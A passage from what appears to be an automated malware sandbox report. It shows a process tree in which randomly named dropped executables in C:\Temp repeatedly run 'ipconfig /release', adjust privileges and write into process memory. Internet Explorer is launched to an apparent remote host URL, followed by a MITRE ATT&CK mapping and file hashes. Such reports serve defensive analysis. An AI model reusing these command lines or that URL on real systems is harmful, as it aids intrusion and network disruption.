    C:\temp\CreateProcess.exe C:\Temp\i_gdywqoigay.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:2588
  - - C:\Temp\i_gdywqoigay.exe
      C:\Temp\i_gdywqoigay.exe ups_ins
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:788
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\nlfdyvqoig.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:3124
  - - C:\Temp\nlfdyvqoig.exe
      C:\Temp\nlfdyvqoig.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4040
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:4688
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:772
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_nlfdyvqoig.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:456
  - - C:\Temp\i_nlfdyvqoig.exe
      C:\Temp\i_nlfdyvqoig.exe ups_ins
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3836
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\qnifaysqki.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2228
  - - C:\Temp\qnifaysqki.exe
      C:\Temp\qnifaysqki.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1928
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:4136
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:2040
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_qnifaysqki.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:3536
  - - C:\Temp\i_qnifaysqki.exe
      C:\Temp\i_qnifaysqki.exe ups_ins
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4060
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\kicavsnkfd.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:4340
  - - C:\Temp\kicavsnkfd.exe
      C:\Temp\kicavsnkfd.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1148
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:1888
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4992
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_kicavsnkfd.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:4380
  - - C:\Temp\i_kicavsnkfd.exe
      C:\Temp\i_kicavsnkfd.exe ups_ins
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2700
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\icausmkfcx.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:4828
  - - C:\Temp\icausmkfcx.exe
      C:\Temp\icausmkfcx.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3940
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:1600
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4212
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_icausmkfcx.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:2868
  - - C:\Temp\i_icausmkfcx.exe
      C:\Temp\i_icausmkfcx.exe ups_ins
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1608
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\zxrpjhbzur.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:1452
  - - C:\Temp\zxrpjhbzur.exe
      C:\Temp\zxrpjhbzur.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1476
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:2864
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4680
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_zxrpjhbzur.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:3168
  - - C:\Temp\i_zxrpjhbzur.exe
      C:\Temp\i_zxrpjhbzur.exe ups_ins
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2108
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\zwrpjhbzur.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:1572
  - - C:\Temp\zwrpjhbzur.exe
      C:\Temp\zwrpjhbzur.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2688
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:4248
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:2960
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_zwrpjhbzur.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:5080
  - - C:\Temp\i_zwrpjhbzur.exe
      C:\Temp\i_zwrpjhbzur.exe ups_ins
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4040
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\wrojhbztrl.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2456
  - - C:\Temp\wrojhbztrl.exe
      C:\Temp\wrojhbztrl.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:844
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:4496
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:3128
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_wrojhbztrl.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:2592
  - - C:\Temp\i_wrojhbztrl.exe
      C:\Temp\i_wrojhbztrl.exe ups_ins
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4984
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\qoigbytrlj.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:5004
  - - C:\Temp\qoigbytrlj.exe
      C:\Temp\qoigbytrlj.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4704
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:4136
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:3752
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_qoigbytrlj.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:3800
  - - C:\Temp\i_qoigbytrlj.exe
      C:\Temp\i_qoigbytrlj.exe ups_ins
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4544
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\nlgdyvqoig.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:4340
  - - C:\Temp\nlgdyvqoig.exe
      C:\Temp\nlgdyvqoig.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1776
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:2668
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4756
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_nlgdyvqoig.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:4944
  - - C:\Temp\i_nlgdyvqoig.exe
      C:\Temp\i_nlgdyvqoig.exe ups_ins
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1052
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\vqnigaysql.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:3648
  - - C:\Temp\vqnigaysql.exe
      C:\Temp\vqnigaysql.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1504
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:4692
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:3636
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_vqnigaysql.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:1912
  - - C:\Temp\i_vqnigaysql.exe
      C:\Temp\i_vqnigaysql.exe ups_ins
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2152
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\sqkicausnk.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2476
  - - C:\Temp\sqkicausnk.exe
      C:\Temp\sqkicausnk.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4592
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:728
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:1720
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_sqkicausnk.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:4888
  - - C:\Temp\i_sqkicausnk.exe
      C:\Temp\i_sqkicausnk.exe ups_ins
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:5028
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\sqkicausnk.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:3176
  - - C:\Temp\sqkicausnk.exe
      C:\Temp\sqkicausnk.exe ups_run
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4680
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:1452
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4420
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_sqkicausnk.exe ups_ins
    3⤵
    PID:2484
  - - C:\Temp\i_sqkicausnk.exe
      C:\Temp\i_sqkicausnk.exe ups_ins
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1884
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\xupnhfzpjh.exe ups_run
    3⤵
    PID:772
  - - C:\Temp\xupnhfzpjh.exe
      C:\Temp\xupnhfzpjh.exe ups_run
      4⤵
      System Location Discovery: System Language Discovery
      PID:4696
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        
        PID:3240
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4248
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_xupnhfzpjh.exe ups_ins
    3⤵
    PID:4700
  - - C:\Temp\i_xupnhfzpjh.exe
      C:\Temp\i_xupnhfzpjh.exe ups_ins
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4000
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\xrpjhczusm.exe ups_run
    3⤵
    PID:4444
  - - C:\Temp\xrpjhczusm.exe
      C:\Temp\xrpjhczusm.exe ups_run
      4⤵
      System Location Discovery: System Language Discovery
      PID:2440
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        
        PID:3740
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:1904
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_xrpjhczusm.exe ups_ins
    3⤵
    PID:3456
  - - C:\Temp\i_xrpjhczusm.exe
      C:\Temp\i_xrpjhczusm.exe ups_ins
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4176
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\trmjecwuom.exe ups_run
    3⤵
    PID:5084
  - - C:\Temp\trmjecwuom.exe
      C:\Temp\trmjecwuom.exe ups_run
      4⤵
      System Location Discovery: System Language Discovery
      PID:5008
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        
        PID:4984
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:2592
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_trmjecwuom.exe ups_ins
    3⤵
    PID:4232
  - - C:\Temp\i_trmjecwuom.exe
      C:\Temp\i_trmjecwuom.exe ups_ins
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3596
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\tojgbytrlj.exe ups_run
    3⤵
    PID:3524
  - - C:\Temp\tojgbytrlj.exe
      C:\Temp\tojgbytrlj.exe ups_run
      4⤵
      System Location Discovery: System Language Discovery
      PID:4168
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        
        PID:1384
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:1472
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_tojgbytrlj.exe ups_ins
    3⤵
    PID:4992
  - - C:\Temp\i_tojgbytrlj.exe
      C:\Temp\i_tojgbytrlj.exe ups_ins
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3924
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\ywqojgbztr.exe ups_run
    3⤵
    PID:3544
  - - C:\Temp\ywqojgbztr.exe
      C:\Temp\ywqojgbztr.exe ups_run
      4⤵
      System Location Discovery: System Language Discovery
      PID:4520
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        
        PID:4560
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:2372
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_ywqojgbztr.exe ups_ins
    3⤵
    PID:2928
  - - C:\Temp\i_ywqojgbztr.exe
      C:\Temp\i_ywqojgbztr.exe ups_ins
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2752
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\ytqljdbvtn.exe ups_run
    3⤵
    PID:4880
  - - C:\Temp\ytqljdbvtn.exe
      C:\Temp\ytqljdbvtn.exe ups_run
      4⤵
      System Location Discovery: System Language Discovery
      PID:2204
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        
        PID:1256
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4204
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_ytqljdbvtn.exe ups_ins
    3⤵
    PID:4692
  - - C:\Temp\i_ytqljdbvtn.exe
      C:\Temp\i_ytqljdbvtn.exe ups_ins
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1504
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\vpnifaysqk.exe ups_run
    3⤵
    PID:4684
  - - C:\Temp\vpnifaysqk.exe
      C:\Temp\vpnifaysqk.exe ups_run
      4⤵
      System Location Discovery: System Language Discovery
      PID:3916
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        
        PID:2464
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4708
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_vpnifaysqk.exe ups_ins
    3⤵
    PID:2476
  - - C:\Temp\i_vpnifaysqk.exe
      C:\Temp\i_vpnifaysqk.exe ups_ins
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3680
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3612
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3612 CREDAT:17410 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:1552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Temp\CreateProcess.exe

Filesize
3KB

MD5
fb4243e3804097b97070a5420f2c810c

SHA1
1bd74c070edb474cf17fc37541f46ea9d5bd62e8

SHA256
d16d45bda13edfc146813a43e88b90625812f1785e2e69bc7c9c36ee8501dfe9

SHA512
66cb7591baa101f84b6603ce6bd30d064b91a35daa30e405a2c0b03973facf279ccfcf4621d4583239a64115d5676228234a0b97d63f2320b6d22290840c5c4e

Download Submit
C:\Temp\gdywqoigay.exe

Filesize
361KB

MD5
d1ca370f7bb41648f1b48b38229f1da3

SHA1
bb4963ab28ae2cb1c1b82f214d98aa563b735a44

SHA256
3ba245811d86d330fb854e348b54d5259b3ce78ce3c5dbc5086cc4c060178168

SHA512
4ce84bd0fbd5b042822b3d0625a5848e12718bc6bfd8cf6d9135f3ceb3bf06cfb908cd6f0a756f4059c11b829b86cf728a503c3703eaa821bde1cb56e517241a

Download Submit
C:\Temp\i_gdywqoigay.exe

Filesize
361KB

MD5
b841cc740a9b757252922650dd0f9d1e

SHA1
709ced144ed01aa6866935c2d4aa4fd9754cf317

SHA256
7ae86778864f73f93bffdd2e62207c44b9454b963fcfbffad206b1cb09628ebb

SHA512
4ce78a5af66f2ece9b9da804f1927b2602750ce91dc40e2127518d7f123fd699ae1d62c15378ad8a27c32c7dc0dc174d4ecb29e6750ed4805b2faa08062b24a0

Download Submit
C:\Temp\i_icausmkfcx.exe

Filesize
361KB

MD5
a7f1cc88ac582289ea363c6972078854

SHA1
9d7b79103b21c3c3bf9fe3f1b6b18436d19bac21

SHA256
6bf4e4af4946718a5bf11ca10d5d91db32bb2ca9b4874f1fecbd3a57067e5133

SHA512
b298b13cf76fc0093cfa1a922deff77a6edeaae3fa066752f69cf8f97070e68f009ba1cf8939a73bd845d31ac25475fbfd4de0d2bb37f1c2ffb4a13cd81af388

Download Submit
C:\Temp\i_kicavsnkfd.exe

Filesize
361KB

MD5
5c9d8e02d6426f41c743f8f40febad58

SHA1
1786f8e2252dff5f7e7331135f839b8b109bdcd5

SHA256
2f17bd8bbd0732153309503ac39505912d33d17b705f45355ed638acedfa4701

SHA512
9f2b2c5d0a0f69264f7a68c80dd06547fbadd15c61ba3811b57b02c99d88aa640fbca260ad8bf18c0b4ce63004455ef7f50023e74277e4d827832a6acca272b4

Download Submit
C:\Temp\i_nlfdyvqoig.exe

Filesize
361KB

MD5
087c66408c4e509cf6299cde819c8f76

SHA1
1017eff42d4a1b670503d834305f9e5b5e639835

SHA256
90648b2f1512b8c4048e05de4a293847eb26b2240bed172335ec9a1b4e4d9f1f

SHA512
60d6d899dd503de54d22354aeb136acd23e0bcabf63fd4da9f64db7e2a4200e632e6cd5eaf3645ded5dfef5f9218e5f9add2c67a1951a1efa60259fcadbb8549

Download Submit
C:\Temp\i_qnifaysqki.exe

Filesize
361KB

MD5
03fe5c6a40c068a73da36ea305428b5c

SHA1
b5b94c2a68a8553c2237aba8645b70e5d8cbb7c6

SHA256
8f98787065475c22897fd315818be3039954ba6bbf0e5e64b5e5cd718775cf63

SHA512
57de2315e3ec248d05ee6f6df8ce34fa2dc60c4c55ff430357db81f0426557bc71980419f2a2f43c766c5be10501b0dab3bc9f3ae5f3ed6e6538d2ebf2037aa9

Download Submit
C:\Temp\i_wrojhbztrl.exe

Filesize
361KB

MD5
73502acfb9013adcae4a9284169558df

SHA1
5b25d27292eef95d181b632267399d6d9f6899bd

SHA256
cc6790e99e196c6a83ebe519e017c4d3d1ea44ed42722cd5eadcc50f803eb95e

SHA512
528fc0f1e918d4fcb99de66665497732f1b3acbeb2defe438c8c4e71c3bddee8027775aa626fefacd9eb6da05d538ad05f1b0e5ec094e4a3734d764fb6591234

Download Submit
C:\Temp\i_zwrpjhbzur.exe

Filesize
361KB

MD5
e8aa6a378ef211101932aafcfcb5e8f2

SHA1
2965b7486039a175d951385e88e43a6842b42304

SHA256
61c439d6a69ed40a0e1fdf9605ab894dab09cd5ecf070e75c6d74a65de2e1baf

SHA512
d7d28cd3473e93886282ac0465381495f0c63c0facbdd41bdf39faa7675ce396fe7b7e5073f387f34dc158ef3538803c6cc52e7784ec80447c73bcefca79b429

Download Submit
C:\Temp\i_zxrpjhbzur.exe

Filesize
361KB

MD5
39ec62e8b57965eb85e5c77a34c41e4b

SHA1
063746cfc6aa49a9245c44facb77dc9fc8adf154

SHA256
47c8c90b0a56f4101de718bf51d07552b60409d8a1627c6891e6d943f899ce6d

SHA512
cb38aecb0ce254632f11ada51e74de8101e00e4be6089389a45cd1edc5388afa8a127085a8cd09b788e2a32dfb3233c471077cc7139e74820e3ea643b8c0e77b

Download Submit
C:\Temp\icausmkfcx.exe

Filesize
361KB

MD5
b73f3151d8cce608aaf5c4ae8f047162

SHA1
fef4ad5b70a4637c187d3b5eb2801b1fa0e607df

SHA256
b53d2dc09aa898265e171dc6492bce50d3b7d8d9607c9204f9642d0b13550f40

SHA512
7e07b3a3919a613fa2d1c2a0fd5a58b1ad89f2d723b92ff2f251e17ab8a83677a2f15acbf0a57085dda540989156bbe6fecd2fc7d3b6ed2726c9c84cf58cde8a

Download Submit
C:\Temp\kicavsnkfd.exe

Filesize
361KB

MD5
b568cf9d37fd4bb64bebc9e4c33a94ec

SHA1
038540f90cbaf212704fa4dff0788d4c9fb53432

SHA256
ad83c03098a76acbdfa9f4ec937ca1f4597779e62ca17e816719fd4776f84866

SHA512
a89b695a9c2e2d61c4ab792901e1e7d5c96b1ec4d5e52ddb55dcf8a7db6d439af7f22f77f33ba3a29afdccd401aa805b36441ab54ab631fb0431527734b9f4a9

Download Submit
C:\Temp\nlfdyvqoig.exe

Filesize
361KB

MD5
9b76078a57618ecac596e3eb9f255a0f

SHA1
96e9f3d7a36a5fcd6ef9e6d7b951320e893bc61a

SHA256
bc31e83265f759b8dce30fbbfcb6dbbfe7745f029af4352e02849ceaaaa5a75e

SHA512
9954e3424e5b1869f77da30c8d4ebeee02008b1114488b478123ffb1d023d7972f0d3abd46405fd030db1b22fee802516801e46c3de23d68e1376a51bbf45c0e

Download Submit
C:\Temp\qnifaysqki.exe

Filesize
361KB

MD5
570cd50a8921559bf53778fb707ce976

SHA1
66ce756983123145c85f652ea6f198225b3490a0

SHA256
001a7d85907cd24e8cb46e6d66272d051e88d4d29bb13fba0a701506b3a94e73

SHA512
a475ee10201e03efe7945bd972fac7a4713d23e5cc7996593b6c3703c545804e3d19ed71223097c64dee35c5a0273a4fd4f93f20738f7f553ee4187139b4d7ff

Download Submit
C:\Temp\qoigbytrlj.exe

Filesize
361KB

MD5
7ddfe62a109ea9754b9de4df0c6dc933

SHA1
77184c2dbc1e6c8e5e77c78b4ff13ff5baf5ddcf

SHA256
84fe1775b616cfee397600857f82a9934d927836f96b1137293ac4aaed3a61de

SHA512
9fe0d995b2ab8e0422350e318a0ae5ea550be67786fd506a7713f3f6004c3adf6958166f15bf70aa14734659c57eebe87f70f5765d2a89256a4cab74715ba313

Download Submit
C:\Temp\wqoigaytqljdbvtn.exe

Filesize
361KB

MD5
51c15b49a54bb60113acf55cfd4c6446

SHA1
5d96e87d95b0f11fbf34ab0dd4a7c6b7a65782bb

SHA256
8a842c61f17dae6baf54c1a2b4eb7f857dc8afc50db8bcb1f28e07f92d696f52

SHA512
0d67438e0bd5420a92d9312931a1c90aca82b0ced32684a5313d226569672f470bd14c7101f64a6c29360acbc09d4ec30088757a9cb6fb854060fb4e6aef5810

Download Submit
C:\Temp\wrojhbztrl.exe

Filesize
361KB

MD5
7cd89e040b5836b1b4f64e6e65ef8795

SHA1
e0344cba61a0e91644edff7fbd1c94845d353f66

SHA256
98573969b63310620e92dc516d517226684b4f8e6a5ce8ca0c28442f98a360ee

SHA512
25750a3d6b9b8be8d54989a5187a2e61c68b8a7a4d75b05f27ed309bad91690b7f7b98e62477679a50177236b7cc018e774f1945ae7230f8ccb36037d1219eee

Download Submit
C:\Temp\zwrpjhbzur.exe

Filesize
361KB

MD5
e6fd1e2106a1280c71002bbfb0215f16

SHA1
67cc99617f523ec2cd64c2fd08a97fb733b6e4f2

SHA256
ffec083a2587c7685f296fa5b8cfd91f64e34583aee6f5c60d83488fd8ed97d4

SHA512
7ebf60c0b1c70e26a15f5da95c29b7d9471ef4777d5c19a362a0f2413f93bda24765b1beef472985e6ea6241fb7681726cffb100775619b358c84780a33e8d59

Download Submit
C:\Temp\zxrpjhbzur.exe

Filesize
361KB

MD5
b35bd0600440a5e31a5d6637b5607eb8

SHA1
8f31e76f03a7d83ff94c43794d650df5caa39817

SHA256
e47259df1f303d592e973ecc4008aa391a063d128639cc8bf7ee4a1c5d15e543

SHA512
12addf307820c00a9c74ca8417fdf897b6d970cdaaa1eb692e8a251c0b1cb4a8e65aacfcb54a49e50ca98f62d9fa51d21f1a993389951a10803afb5583b26250

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
471B

MD5
d08423737246250d0c3c50ea390cd1c4

SHA1
5b48dab1d90ac5357dafd6ad8b6990da92aaf75a

SHA256
7714ff60052145ab9a2bdd947fbbec0572c02389256b2db314f2670764862789

SHA512
67f5c7e7078f4fb5216b91b31e6b38c5497324413f8fc79cd662cad952a808453289b3ef2226fa377812bfc93697f11e5d6e064dc0e5f80b1a6b15dc516eb10e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
404B

MD5
da7448520be3e85bd80e8537683cd72b

SHA1
